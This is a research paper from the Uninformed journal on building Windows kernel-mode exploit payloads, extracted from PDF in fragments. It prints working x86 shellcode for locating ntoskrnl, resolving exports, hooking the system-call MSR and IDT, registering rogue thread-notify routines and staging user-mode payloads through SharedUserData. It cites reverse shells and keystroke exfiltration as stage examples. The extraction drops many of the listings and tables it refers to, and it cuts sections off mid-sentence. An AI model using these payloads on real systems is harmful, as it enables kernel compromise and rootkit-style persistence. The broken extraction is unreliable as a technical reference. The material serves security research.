Uninformed V3a4 PDF
Uninformed V3a4 PDF
bugcheck skape
[email protected] [email protected]
Contents
1 Foreword 2
2 Introduction 3
3 General Techniques 5
3.1 Finding Ntoskrnl.exe Base Address . . . . . . . . . . . . . . . . . 5
3.1.1 IDT Scandown . . . . . . . . . . . . . . . . . . . . . . . . 6
3.1.2 KPRCB IdleThread Scandown . . . . . . . . . . . . . . . 7
3.1.3 SYSENTER EIP MSR Scandown . . . . . . . . . . . . . . 7
3.1.4 Known Portable Base Scandown . . . . . . . . . . . . . . 8
3.2 Resolving Symbols . . . . . . . . . . . . . . . . . . . . . . . . . . 8
4 Payload Components 11
4.1 Migration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
4.1.1 Direct IRQL Adjustment . . . . . . . . . . . . . . . . . . 13
4.1.2 System Call MSR/IDT Hooking . . . . . . . . . . . . . . 14
4.1.3 Thread Notify Routine . . . . . . . . . . . . . . . . . . . . 16
4.1.4 Hooking Object Type Initializer Procedures . . . . . . . . 20
4.1.5 Hooking KfRaiseIrql . . . . . . . . . . . . . . . . . . . . . 20
4.2 Stagers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
4.2.1 System Call Return Address Overwrite . . . . . . . . . . 21
4.2.2 Thread APC . . . . . . . . . . . . . . . . . . . . . . . . . 22
4.2.3 User-mode Function Pointer Hook . . . . . . . . . . . . . 23
4.2.4 SharedUserData SystemCall Hook . . . . . . . . . . . . . 23
4.3 Recovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
4.3.1 Thread Spinning . . . . . . . . . . . . . . . . . . . . . . . 28
4.3.2 Throwing an Exception . . . . . . . . . . . . . . . . . . . 29
4.3.3 Thread Restart . . . . . . . . . . . . . . . . . . . . . . . . 29
4.3.4 Lock Release . . . . . . . . . . . . . . . . . . . . . . . . . 31
4.4 Stages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
5 Conclusion 32
1
Chapter 1
Foreword
2
Chapter 2
Introduction
3
jor distinction between kernel-mode and user-mode payloads, however, is that
kernel-mode payloads are burdened with some extra considerations that are not
found in user-mode payloads, and for that reason are broken down into a few
more distinct payload components. These extra components will be discussed
at length in chapter 4.
The purpose of this document is to provide the reader with a point of reference
for the major aspects common to most all kernel-mode payloads. To simplify
terminology, kernel-mode payloads will be referred to throughout the document
as R0 payloads, short for ring 0, which symbolizes the processor ring that kernel-
mode operates at on x86. For the same reason, user-mode payloads will be
referred to throughout the document as R3 payloads, short for ring 3. To fully
understand this paper, the reader should have a basic understanding of Windows
kernel-mode programming.
In order to limit the scope of this document, the methods that can be used
to achieve code execution through different vulnerability scenarios will not be
discussed at length. The main reason for this is that general approaches to
payload implementation are typically independent of the vulnerability in which
they are used for. However, references to some of the research in this area can
be found in the bibliography for readers who might be curious[4]. Furthermore,
this document will not expand upon some of the interesting things that can be
done in the context of a kernel-mode payload, such as keyboard sniffing. Instead,
the topic of advanced kernel-mode payloads will be left for future research. The
authors hope that by describing the various elements that will compose most all
kernel-mode payloads, the process involved in implementing some of the more
interesting parts will be made easier.
With all of the formalities out of the way, the first leap to take is one regarding
an understanding of some of the general techniques that can be applied to
kernel-mode payloads, and it’s there that the journey begins.
4
Chapter 3
General Techniques
This chapter will outline some of the techniques and algorithms that are gener-
ally applicable to most kernel-mode payloads. For example, kernel-mode pay-
loads may find it necessary to resolve certain exported symbols for use within
the payload itself, much the same as user-mode payloads find it necessary.
to indicate a direction
5
be a great way to save space.
Another thing to keep in mind with some of these implementations is that they
may fail if the /3GB boot flag is specified. This is not generally very common,
but it could be something that is encountered in the real world.
Size: 17 bytes
Compat: All
Credit: eEye
The approach for finding the base address of nt discussed in eEye’s paper in-
volved finding the high-order word of an IDT handler that was set to a symbol
somewhere inside nt. After acquiring the symbol address, the payload simply
walked down toward lower addresses in memory byte-by-byte until it found the
MZ checksum. The following disassembly shows the approach taken to do this[2]:
This approach is perfectly fine, however, it could be prone to error if the four
checksum bytes were found somewhere within nt which did not actually coincide
with its base address. This issue is one that is present to any scandown technique
(referred to as “mid-deltas” by eEye). However, scanning down byte-by-byte
can be seen as potentially more error prone, but this is purely conjecture at this
point as the authors are aware of no specific cases in which it would fail. It may
also fail if the direction flag is not cleared, though the chances of this happening
are minimal. One other limiting factor may be the presence of the NULL byte
in the comparison. It is possible to slightly improve (depending upon which
perspective one is looking at it from) this approach by scanning downward one
page at a time and by eliminating the need to clear the direction flag2 . This
also eliminates the presence of NULL bytes. However, some of these changes
lead to the code being slightly larger (20 bytes total):
6
0000000D 48 dec eax
0000000E 6681384D5A cmp word [eax],0x5a4d
00000013 75F4 jnz 0x9
Size: 17 bytes
Compat: All
The base address of nt can also be found by looking at the IdleThread attribute
of the KPRCB for the current KPCR. As it stands, this attribute always appears to
point to a global variable inside of nt. Just like the IDT scandown approach,
this technique uses the symbol as a starting point to walk down and find the
base address of nt by looking for the MZ checksum. The following disassembly
shows how this is accomplished:
This approach will fail if it happens that the IdleThread attribute does not
point somewhere within nt, but thus far a scenario such as this has not been
observed. It would also fail if the Kprcb attribute was not found immediately
after the Kpcr, but this has not been observed in testing.
Size: 19 bytes
Compat: XP, 2003 (modern processors only)
For processors that support the system call MSR 0x176 (SYSENTER EIP MSR),
the base address of nt can be found by reading the registered system call handler
and then using the scandown technique to find the base address. The following
disassembly illustrates how this can be accomplished:
7
3.1.4 Known Portable Base Scandown
Size: 17 bytes
Compat: 2000, XP, 2003 SP0
A quick sampling of base addresses across different major releases show that the
base address of nt is always within a certain range. The one exception to this
in the polling was Windows 2003 Server SP1, and for that reason this payload
is not compatible. The basic idea is to simply use an offset that is known to
reside within the region that nt will be mapped at on different operating system
versions. The table below describes the mapping ranges for nt on a few different
samplings:
As can be seen from the table, the address 0x8050babe resides within every
region that nt could be mapped at except for Windows 2003 Server SP1. The
payload below implements this approach:
Size: 67 bytes
Compat: All
Another aspect common to almost all payloads on Windows is the use of code
that walks the export directory of an image to resolve the address of a symbol3 .
In the kernel, things aren’t much different. Barnaby refers to the use of a two-
byte XOR/ROR hash in the eEye paper. Alternatively, a four byte hash could
be used, but as pointed out in the eEye paper, this leads to a waste of space
when two-byte hash could suffice equally well provided there are no collisions.
The approach implemented below involves passing a two-byte hash in the ebx
register (the high order bytes do not matter) and the base address of the image
3 The technique of walking the export directory to resolve symbols has been used for ages,
8
to resolve against in the ebp register. In order to save space, the code below is
designed in such a way that it will transfer execution into the function after it
resolves it, thus making it possible to resolve and call the function in one step
without having to cache addresses. In most cases, this leads to a size efficiency
increase.
00000000 60 pusha
00000001 31C9 xor ecx,ecx
00000003 8B7D3C mov edi,[ebp+0x3c]
00000006 8B7C3D78 mov edi,[ebp+edi+0x78]
0000000A 01EF add edi,ebp
0000000C 8B5720 mov edx,[edi+0x20]
0000000F 01EA add edx,ebp
00000011 8B348A mov esi,[edx+ecx*4]
00000014 01EE add esi,ebp
00000016 31C0 xor eax,eax
00000018 99 cdq
00000019 AC lodsb
0000001A C1CA0D ror edx,0xd
0000001D 01C2 add edx,eax
0000001F 84C0 test al,al
00000021 75F6 jnz 0x19
00000023 41 inc ecx
00000024 6639DA cmp dx,bx
00000027 75E3 jnz 0xc
00000029 49 dec ecx
0000002A 8B5F24 mov ebx,[edi+0x24]
0000002D 01EB add ebx,ebp
0000002F 668B0C4B mov cx,[ebx+ecx*2]
00000033 8B5F1C mov ebx,[edi+0x1c]
00000036 01EB add ebx,ebp
00000038 8B048B mov eax,[ebx+ecx*4]
0000003B 01E8 add eax,ebp
0000003D 8944241C mov [esp+0x1c],eax
00000041 61 popa
00000042 FFE0 jmp eax
To understand how this function works, take for example the resolution of
nt!ExAllocatePool. First, a hash of the string “ExAllocatePool” must be
obtained using the same algorithm that the payload uses. For this payload,
the result is 0x0311b83f4 . Since the implementation uses a two-byte hash,
only 0xb83f is needed. This hash is then stored in the bx register. Since
ExAllocatePool is found within nt, the base address of nt must be passed in
the ebp register. Finally, in order to perform the resolution, the arguments to
nt!ExAllocatePool must be pushed onto the stack prior to calling the reso-
lution routine. This is because the resolution routine will transfer control into
nt!ExAllocatePool after the resolution succeeds and therefore must have the
proper arguments on the stack.
4 This was calculated by doing perl -Ilib -MPex::Utils -e "printf %̈.8x,̈
Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);"
9
One downside to this implementation is that it won’t support the resolution of
data exports (since it tries to jump into them). However, for such a purpose, the
routine could be modified to simply not issue the jmp instruction and instead
rely on the caller to execute it. It is also important for payloads that use this
resolution technique to clear the direction flag with cld.
10
Chapter 4
Payload Components
This chapter will outline four distinct components that can be used in con-
junction with one another to produce a logical kernel-mode payload. Unlike
user-mode vulnerabilities, kernel-mode vulnerabilities tend to be a bit more in-
volved when it comes to considerations that must be made when attempting
to execute code after successfully exploiting a target. These concerns include
things like IRQL considerations, setting up code for execution, gracefully con-
tinuing execution, and what action to actually perform. Some of these steps
have parallels to user-mode payloads, but others do not.
The first consideration that must be made when implementing a kernel-mode
payload is whether or not the IRQL that the payload will be running at is a
concern. For instance, if the payload will be making use of functions that require
the processor to be running at PASSIVE LEVEL, then it may be necessary to
ensure that the processor is transitioned to a safe IRQL. This consideration is
also dependent on the vulnerability in question as to whether or not the IRQL
will even be a problem. For scenarios where it is a problem, a migration payload
component can be used to ensure that the code that requires a specific IRQL is
executed in a safe manner.
The second consideration involves staging either a R3 payload (or secondary
R0 payload) to another location for execution. This payload component is
encapsulated by a stager which has parallels to payload stagers found in typical
user-mode payloads. Unlike user-mode payloads, though, kernel-mode stagers
are typically designed to execute code in another context, such as in a user-
mode process or in another kernel-mode thread context. As such, stagers may
sometimes overlap with the purpose of the migration component, such as when
the act of staging leads to the stage executing at a safe IRQL, and can therefore
be considered a superset of a migration component in that case.
The third consideration has to do with how the payload gracefully restores
11
execution after it has completed. This portion of a kernel-mode payload is
classified as the recovery component. In short, the recovery component of a
payload finds a way to make sure that the kernel does not crash or otherwise
become unusable. If the kernel were to crash, any code that the payload had
intended to execute may not actually get a chance to run depending on how the
payload is structured. As such, recovery is one of the most volatile and critical
aspects of a kernel-mode payload.
Finally, and most importantly, the fourth component of a kernel-mode payload
is the stage component. It is this component that actually performs the real
work of the payload. For instance, a stage component might detect that it’s
running in the context of lsass.exe and create a reverse shell in user-mode.
As another example of a stage component, eEye demonstrated a keyboard hook
that sent keystrokes back in ICMP echo responses from the host[2]. Stages have
a very broad definition.
The following sections will explain each one of the four payload components in
detail and offer techniques and implementations that can be used under certain
situations.
4.1 Migration
The reason this is important is because the IRQL that the processor will be
running at when a kernel-mode vulnerability is triggered is highly dependent
upon the area in which the vulnerability occurs. For this reason, it may be
generally necessary to have an approach for either directly or indirectly lowering
the IRQL in such a way that permits the use of some of the common driver
support routines. As an example, it is not possible to call nt!KeInsertQueueApc
at an IRQL greater than PASSIVE LEVEL.
This section will focus on describing methods that could be used to implement
migration payloads. The purpose of a migration payload is to migrate the
processor to an IRQL that will allow payloads to make use of pageable memory
12
and common driver support routines as described above. The techniques that
can be used to do this vary in terms of stability and simplicity. It’s generally a
matter of picking the right one for the job.
One concern about taking this approach over calling hal!KeLowerIrql is that
the soft-interrupt handlers associated with interrupts that were masked while at
a raised IRQL will not be called. It is unclear whether or not this could lead to
a deadlock, but is theorized that the answer could be yes. However, the authors
did test writing a driver that raised to HIGH LEVEL, spun for a period of time
(during which kb/mouse interrupts were sent), and then manually adjusted the
IRQL as described above. There appeared to be no adverse side effects, but it
has not been ruled out that a deadlock could be possible2 .
Aside from the risks, this approach is nice because it is very small (6 bytes), so
assuming there are no significant problems with it, then the use of this method
would be a no-brainer given the right set of circumstances for a vulnerability.
1 In kernel-mode, the fs segment points to the current processor’s KPCR structure
2 Consequently, if anyone knows a definitive answer to this, the authors would love to hear
it
13
4.1.2 System Call MSR/IDT Hooking
14
placing the symbolic code of 0x176 in ecx and using the rdmsr instruc-
tion. The existing value will be returned in edx:eax. If the IDT entry
at index 0x2e is to be hooked it can be retrieved by first obtaining the
processors IDT base using the sidt instruction. The entry then can be
located at offset 0x170 relative to the base since the IDT is an array of
KIDTENTRY structures. Lastly the address of the code that services the
interrupt is in KIDTENTRY with the low word at Offset and high word
at ExtendedOffset. The following is the definition of KIDTENTRY.
kd> dt _KIDTENTRY
+0x000 Offset : Uint2B
+0x002 Selector : Uint2B
+0x004 Access : Uint2B
+0x006 ExtendedOffset : Uint2B
00000000 FC cld
00000001 BF80FDDFFF mov edi,0xffdffd80
15
00000006 57 push edi
00000007 6A76 push byte +0x76
00000009 58 pop eax
0000000A FEC4 inc ah
0000000C 99 cdq
0000000D 91 xchg eax,ecx
0000000E 89F8 mov eax,edi
00000010 66B87002 mov ax,0x270
00000014 3910 cmp [eax],edx
00000016 EB06 jmp short 0x1e
00000018 50 push eax
00000019 0F32 rdmsr
0000001B AB stosd
0000001C EB3E jmp short 0x5c
0000001E 648B4238 mov eax,[fs:edx+0x38]
00000022 8D4408FA lea eax,[eax+ecx-0x6]
00000026 50 push eax
00000027 91 xchg eax,ecx
00000028 8B4104 mov eax,[ecx+0x4]
0000002B 668B01 mov ax,[ecx]
0000002E AB stosd
0000002F EB2B jmp short 0x5c
00000031 5E pop esi
00000032 6A01 push byte +0x1
00000034 59 pop ecx
00000035 F3A5 rep movsd
00000037 B8FF2580FD mov eax,0xfd8025ff
0000003C AB stosd
0000003D 66C707DFFF mov word [edi],0xffdf
00000042 59 pop ecx
00000043 58 pop eax
00000044 0404 add al,0x4
00000046 85C9 test ecx,ecx
00000048 9C pushf
00000049 FA cli
0000004A 668901 mov [ecx],ax
0000004D C1E810 shr eax,0x10
00000050 66894106 mov [ecx+0x6],ax
00000054 9D popf
00000055 EB04 jmp short 0x5b
00000057 31D2 xor edx,edx
00000059 0F30 wrmsr
0000005B C3 ret ; replace with recovery method
0000005C E8D0FFFFFF call 0x31
16
involves setting up a thread notify routine which is normally done by call-
ing nt!PsSetCreateThreadNotifyRoutine. Unfortunately, the documentation
states that this routine can only be called at PASSIVE LEVEL, thus making it
appear as if calling it from a payload would lead to problems. While this is
true, it is also possible to manually create a notify routine by modifying the
global array of thread notify routines. Although this array is not exported,
it is easy to find by extracting an address reference to it from one of either
nt!PsSetCreateThreadNotifyRoutine or nt!PsRemoveCreateThreadNotifyRoutine.
By using this basic approach, it is possible to write a migration payload that
transitions to PASSIVE LEVEL by registering a callback that is called whenever
a thread is created or deleted.
In more detail, a few steps must be taken in order to get this to work properly
on 2000 and XP. The steps taken on 2003 should be pretty much the same as
XP, but have not been tested.
17
5. If the payload is running on 2000
On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of func-
tion pointers. For that reason, registering the notify routine is much sim-
pler and can actually be done by calling nt!PsSetCreateThreadNotifyRoutine
without much of a concern since no extra memory is allocated. By call-
ing the real exported routine directly, it is not necessary to manually
increment the nt!PspCreateThreadNotifyRoutineCount. Furthermore,
doing so would not be as easy as it is on XP because the count variable is
located quite a distance away from the array itself.
6. Resolve the exported symbol
The symbol resolution approach taken in this payload involves compar-
ing part of an exported symbol’s name with “dNot”. This is done be-
cause on XP, the actual symbol needed in order to extract the address of
nt!PspCreateThreadNotifyRoutine is found a few bytes into
nt!PsRemoveCreateThreadNotifyRoutine. However, on 2000, the ad-
dress of nt!PsSetCreateThreadNotifyRoutine needs to be resolved as
it is going to be directly called. As such, the offset into the string that is
compared between 2000 and XP differs. For 2000, the offset is 0x10. For
XP, the offset is 0x13. The end result of the resolution process is that if
the payload is running on XP, the eax register will hold the address of
nt!PsRemoveCreateThreadNotifyRoutine and if it’s running on 2000 it
will hold the address of nt!PsSetCreateThreadNotifyRoutine.
18
A payload that implements the thread notify routine approach is shown below:
00000000 FC cld
00000001 A12CF1DFFF mov eax,[0xffdff12c]
00000006 48 dec eax
00000007 6631C0 xor ax,ax
0000000A 6681384D5A cmp word [eax],0x5a4d
0000000F 75F5 jnz 0x6
00000011 95 xchg eax,ebp
00000012 BF7002DFFF mov edi,0xffdf0270
00000017 803F01 cmp byte [edi],0x1
0000001A 66D1C7 rol di,1
0000001D 57 push edi
0000001E 750E jnz 0x2e
00000020 89F8 mov eax,edi
00000022 83C008 add eax,byte +0x8
00000025 AB stosd
00000026 AB stosd
00000027 57 push edi
00000028 6A06 push byte +0x6
0000002A 6A13 push byte +0x13
0000002C EB05 jmp short 0x33
0000002E 57 push edi
0000002F 6A81 push byte -0x7f
00000031 6A10 push byte +0x10
00000033 5A pop edx
00000034 31C9 xor ecx,ecx
00000036 8B7D3C mov edi,[ebp+0x3c]
00000039 8B7C3D78 mov edi,[ebp+edi+0x78]
0000003D 01EF add edi,ebp
0000003F 8B7720 mov esi,[edi+0x20]
00000042 01EE add esi,ebp
00000044 AD lodsd
00000045 41 inc ecx
00000046 01E8 add eax,ebp
00000048 813C10644E6F74 cmp dword [eax+edx],0x746f4e64
0000004F 75F3 jnz 0x44
00000051 49 dec ecx
00000052 8B5F24 mov ebx,[edi+0x24]
00000055 01EB add ebx,ebp
00000057 668B0C4B mov cx,[ebx+ecx*2]
0000005B 8B5F1C mov ebx,[edi+0x1c]
0000005E 01EB add ebx,ebp
00000060 8B048B mov eax,[ebx+ecx*4]
00000063 01E8 add eax,ebp
00000065 59 pop ecx
00000066 85C9 test ecx,ecx
00000068 8B1C08 mov ebx,[eax+ecx]
0000006B EB14 jmp short 0x81
0000006D 5E pop esi
0000006E 5F pop edi
0000006F 6A01 push byte +0x1
00000071 59 pop ecx
00000072 F3A5 rep movsd
00000074 7808 js 0x7e
00000076 5F pop edi
00000077 893B mov [ebx],edi
19
00000079 FF4320 inc dword [ebx+0x20]
0000007C EB02 jmp short 0x80
0000007E FFD0 call eax
00000080 C3 ret
00000081 E8E7FFFFFF call 0x6d
The R0 stage must keep in mind that it will be called in the context of a
callback, so in order to ensure graceful recovery the stage must issue a ret 0xc
or equivalent instruction upon completion. The R0 stage must also be capable
of being re-entered without having any adverse side effects. This approach may
also be compatible with 2003, but tests were not performed. This payload could
be made significantly smaller if it were targeted to a specific OS version. One
major benefit to this approach is that the stage will be passed arguments that
are very useful for R3 code injection, such as a ProcessId and ThreadId.
This approach has quite a few cons. First, the size of the payload alone makes
it less useful due to all the work required to just migrate to a safe IRQL. Fur-
thermore, this payload also relies on offsets that may be unreliable across new
versions of the operating system, specifically on XP. It also depends on the
pages that the notify routine array resides at being paged in at the time of the
registration. If they are not, the payload will fail if it is running at a raised
IRQL that does not permit page faults.
One theoretical way that could be used to migrate to a safe IRQL would be
to hook into one of the generalized object type initializer procedures associated
with a specific object type, such as nt!PsThreadType or nt!PsProcessType3 .
The method taken to do this would be to first resolve one of the exported object
types and then alter one of the procedure attributes, such as the OpenProcedure,
to point into a buffer that contains the payload to execute. The payload could
then make a determination on whether or not it’s safe to execute based on the
current IRQL. It may also be safe, in some cases, to to assume that the IRQL
will be PASSIVE LEVEL for a given object type procedure. Matt Conover also
describes how this can be done in his Malware Profiling and Rootkit Detection
on Windows paper[1]. Thanks to Derek Soeder for suggesting this approach.
20
hal!KfRaiseIrql. Inside the hook routine, a check could be performed to see if
the current IRQL is passive and, if so, run the rest of the payload. However, as
Derek points out, one of the problems with this approach would center around
the method used to hook the function considering it’d be somewhat expensive
to do a detours-style preamble hook (although it’s fairly easy to disable write
protection). Still, this approach shows a good line of thinking that could be
used to get to a safe IRQL.
4.2 Stagers
21
payload to a globally accessible location, such as SharedUserData. Once copied,
the next step would be to hook the processor MSR for the system call instruc-
tion. The hook routine for the system call instruction would then alter the
return address of the user-mode stack when called to point to the stage’s global
address and should also make it so the stage can restore execution to the ac-
tual return address after it has completed. Once the return address has been
redirected, the actual system call can be issued. When the system call returns,
it would execute the stage. The stage, once completed, would then restore
registers, such as eax, and transfer control to the actual return address.
This approach would be very transparent and should be completely reliable. The
added benefits of being able to filter system call results make it very interesting
from a memory-resident rootkit perspective.
22
The approach outlined by eEye works perfectly fine and is well thought out,
and as such this subsection will merely describe ways in which it might be
possible to improve the existing implementation. One way in which it might be
optimized would be to eliminate the call to nt!PsLookupProcessByProcessId,
but as their paper points out, this would only be possible for vulnerabilities
that are triggered outside of the context of the Idle process. However, for cases
where this is not a limitation, it would be easier to extract the current thread’s
process from Kpcr->Kprcb->CurrentThread->AcpState->Process. This can
be accomplished through the following disassembly4 :
After the process has been extracted, enumeration to find a privileged system
process could be done in exactly the same manner as the paper describes (by
enumerating the ActiveProcessLinks).
Another improvement that might be made would be to use SharedUserData
as a storage location for the initialized KAPC structure rather than allocating
storage for it with nt!ExAllocatePool. This would save some space by elim-
inating the need to resolve and call nt!ExAllocatePool. While the approach
outlined in the paper describes nt!ExAllocatePool as being used to stage the
payload to an IRQL safe buffer, it would be equally feasible to do so by using
nt!SharedUserData for storage.
Type: R0 to R3 Stager
Size: 68 bytes
Compat: XP, 2003
Migration: Not necessary
One particularly useful approach to staging a R3 payload from R0 is to hijack
the system call dispatcher at R3. To accomplish this, one must have an un-
derstanding of the basic mechanism through which system calls are dispatched
4 This may not be safe if the KPRCB is not located immediately after the KPCR
23
in user-mode. Prior to Windows XP, system calls were dispatched through the
soft-interrupt 0x2e. As such, the method described in this subsection will not
work on Windows 2000. However, starting with XP SP0, the system call in-
terface was changed to support using processor-specific instructions for system
calls, such as sysenter or syscall.
To support this, Microsoft added fields to the KUSER SHARED DATA structure,
which is symbolically known as SharedUserData, that held instructions for is-
suing a system call. These instructions were placed at offset 0x300 by the kernel
and took a form like the code shown below:
To make use of this dynamic code block, each system call stub in ntdll.dll
was implemented to make a call into the instructions found at that location.
ntdll!ZwAllocateVirtualMemory:
77f7e4c3 b811000000 mov eax,0x11
77f7e4c8 ba0003fe7f mov edx,0x7ffe0300
77f7e4cd ffd2 call edx
To make use of the function pointers, each system call stub was changed to issue
an indirect call through the SystemCall function pointer:
24
ntdll!ZwAllocateVirtualMemory:
7c90d4de b811000000 mov eax,0x11
7c90d4e3 ba0003fe7f mov edx,0x7ffe0300
7c90d4e8 ff12 call dword ptr [edx]
The importance behind the approaches taken to issue system calls is that it
is possible to take advantage of the way in which the system call dispatching
interfaces have been implemented. These interfaces can be manipulated in a
manner that allows a payload to be staged from R0 to R3 with very little
overhead. The basic idea behind this approach is that a R3 payload is layered
in between the system call stubs and the kernel. The R3 payload then gets an
opportunity to run prior to a system call being issued within the context of an
arbitrary process.
This approach has quite a few advantages. First, the size of the staging payload
is relatively small because it requires no symbol resolution or other means of
directly scheduling the execution of code in an arbitrary or specific process. Sec-
ond, the staging mechanism is inherently IRQL-safe because SharedUserData
cannot be paged out. This benefit makes it such that a migration technique
does not have to be employed in order to get the R0 payload to a safe IRQL.
One of the disadvantages of the payload outlined below is that it relies on
SharedUserData being executable. However, it should be trivial to alter the
PTE for SharedUserData to set the execute bit if necessary, thus eliminating
the DEP concern.
Another thing to keep in mind about this stager is that the R3 payload must
be written in a manner that allows it to be re-entrant. Since the R3 payload
is layered between user-mode and kernel-mode for system call dispatching, it
can be assumed that the payload will get called many times in many different
process contexts. It is up to the R3 payload to figure out when it should do its
magic and when it should not.
The following steps outline one way in which a stager of this type could be
implemented.
25
The method used to layer between system call stubs and the kernel differs
between XP SP0/SP1 and XP SP2/2003 SP1. To determine whether or
not the machine is XP SP0/SP1, a comparison can be made to see if
the first two bytes found at 0xffdf0300 are equal to 0xd48b (which is
equivalent to a mov edx, esp instruction). If they are equal, then the
operating system is assumed to be XP SP0/SP1. Otherwise, it is assumed
to be XP SP2+.
4. Hooking on XP SP0/SP1
If the operating system version is XP SP0/SP1, hooking is accomplished
by overwriting the first two bytes at 0xffdf0300 with a short jump in-
struction to some offset within SharedUserData that is not used, such
as 0xffdf037c. Prior to doing this overwrite, a few instructions must
be appended to the copied R3 payload that act as a method of restoring
execution so that the original system call actually executes. This is ac-
complished by appending a mov edx, esp / mov ecx, 0x7ffe0302 / jmp
ecx instruction set.
5. Hooking on XP SP2+
If the operating system version is XP SP2, hooking is accomplished by
overwriting the function pointer found at offset 0x300 within SharedUserData.
Prior to overwriting the function pointer, the original function pointer
must be saved and an indirect jmp instruction must be appended to the
copied R3 payload so that system calls can still be processed. The original
function pointer can be saved to 0xffdf0308 which is currently defined
as being used for padding. The jmp instruction can therefore indirectly
acquire the original system call dispatcher address from 0x7ffe0308.
26
The following code illustrates an implementation of this type of staging payload.
It’s roughly 68 bytes in size, excluding the R3 payload and the recovery method.
4.3 Recovery
27
recovery payloads and identifies scenarios in which they may be most useful.
If any one of these conditions is not true, the act of spinning or otherwise block-
ing the thread from continuing normal execution could lead to a deadlock. If the
setting is right, though, this method is perfectly acceptable. If the approach de-
scribed by eEye is used, it will require the resolution of nt!KeDelayExecutionThread
at a minimum, but could also require the resolution of nt!KeYieldExecution
depending on how robust the recovery method is intended to be. The fact that
this requires symbol resolution means that the payload will jump significantly
in size if it does not already involve the resolution of symbols.
Type: R0 Recovery
Size: 2 bytes
Compat: All
Migration: May be required
Requirements: No held locks
An alternative approach is to just spin the calling thread at PASSIVE LEVEL.
If the conditions are right, this should not lead to a deadlock, but it is likely
28
that performance will be adversely affected. The benefit is that it does not
increase the size of the payload by much considering such an approach can be
implemented in two bytes:
Type: R0 Recovery
Size: 3 bytes
Compat: All
Migration: Not necessary
Requirements: No held locks in wrapped frame
If a vulnerability occurs in the context of a frame that is wrapped in an excep-
tion handler, it may be possible to simply trigger an exception that will allow
execution to continue like normal. Unfortunately, the chances of this recovery
method being usable are very slim considering most vulnerabilities are likely to
occur outside of the context of an exception wrapped frame. The usability of
this approach can be tested fairly simply by triggering the overflow in such a
way as to cause an exception to be thrown. If the machine does not crash, it
could be the case that the vulnerability occurred in a function that is wrapped
by an exception handler. Assuming this is the case, writing a payload that
simply triggers an exception is fairly trivial.
Type: R0 Recovery
Size: 41 bytes
Compat: 2000, XP
Migration: May be required
Requirements: No held locks
If a vulnerability occurs in the context of a system worker thread, it may be
possible to cause the thread to restart execution at its entry point without any
major adverse side effects. This avoids the issue of having to restore normal
execution for the context of the current call frame. To accomplish this, the
StartAddress must be extracted from the calling thread’s ETHREAD structure.
Due to the fact that this relies on the use of undocumented fields, it follows
that portability could be a problem. The following table shows the offsets to
the StartAddress routine for different operating system versions:
29
Platform StartAddress Offset Stack Restore Offset
Windows 2000 SP4 0x230 0x254
Windows XP SP0 0x224 0x250
Windows XP SP2 0x224 0x250
A payload that implements this approach that should be compatible with all of
the above described offsets is shown below5 :
This implementation works by first obtaining the current thread context through
fs:0x124. Once obtained, a check is performed to see which operating system
the payload is running on by looking at the NtMinorVersion attribute of the
KUSER SHARED DATA structure. The reason this is necessary is because the offsets
needed to obtain the StartAddress of the thread and the offset that is needed
when restoring the stack are different depending on which operating system is
being used. After resolving the StartAddress and adjusting the stack pointer
to reflect what it would have been when the function was originally called, all
that’s required is to transfer control to the StartAddress.
This approach, at least in this specific implementation, may be closely tied to
vulnerabilities that occur in system worker thread routines, specifically those
that start at nt!ExpWorkerThread. However, the principals could be applied
to other system worker threads if the illustrated implementation proves limited.
It is also important to realize that since this method depends on undocumented
version-specific offsets, it is highly likely that it may not be portable to new
versions of the kernel. This approach should also be compatible with Windows
2003 Server SP0/SP1, but the offsets are likely to be different and have not been
obtained or tested at this point.
5 Testing was only performed on XP SP0
30
4.3.4 Lock Release
Judging from some of the other recovery methods described in this document,
it can be seen that one of the biggest limiting factors has to do with locks being
held when recovery is attempted. To deal with this problem, one would have to
implement a solution that was capable of releasing held locks prior to using a
recovery method. This is more of a theoretical solution than a concrete one, but
if it were possible to release locks held by a thread prior to recovery, then it would
be possible to use some of the more elegant recovery methods. As it stands,
though, the authors are not aware of a feasible solution to this problem that is
capable of releasing the various types of locks in a general manner. Instead, it
would most likely be better to attack this problem on a per-vulnerability basis
rather than attempting to come up with an all-encompassing solution.
Without a proper lock releasing solution, it is likely that even if a vulnerability
can be triggered, the box may deadlock. Again, this is highly dependent on the
vulnerability in question, but it’s not something that should be considered an
academic concern.
4.4 Stages
31
Chapter 5
Conclusion
This document has illustrated some of the general techniques that can be used
when implementing kernel-mode payloads. Examples have been provided for
techniques that can be used to locate the base address of nt and an example
routine has been provided to illustrate symbol resolution. To make kernel-mode
payloads easier to grasp, their anatomy has been broken down into four distinct
units that have been referred to as payload components. These four payload
components can be combined together to form a logical kernel-mode payload.
The purpose of the migration payload component is to transition the processor
to a safe IRQL so that the rest of the payload can be executed. In some cases,
it’s also necessary to make use of a stager payload component in order to move
the payload to another thread context or location for the purpose of execution.
Once the payload is at a safe IRQL and has been staged as necessary, the actual
meat of the payload can be run. This portion of the payload is symbolically
referred to as the stage payload component. After everything is said and done,
the kernel-mode payload has to find some way to ensure that the kernel does
not crash. To accomplish this, a situational recovery payload component can
be used to allow the kernel to continue to execute properly.
While the vectors taken to achieve code execution have not been described in
this document, it is expected that there will continue to be research and improve-
ments in this field. A cycle similar to that seen for user-mode vulnerabilities can
be equally expected in the kernel-mode arena once enough interest is gained.
With the eye of security vendors intently focused on solving the problem of
user-mode software vulnerabilities, the kernel-mode arena will be a playground
ripe for research and discovery.
32
Bibliography
33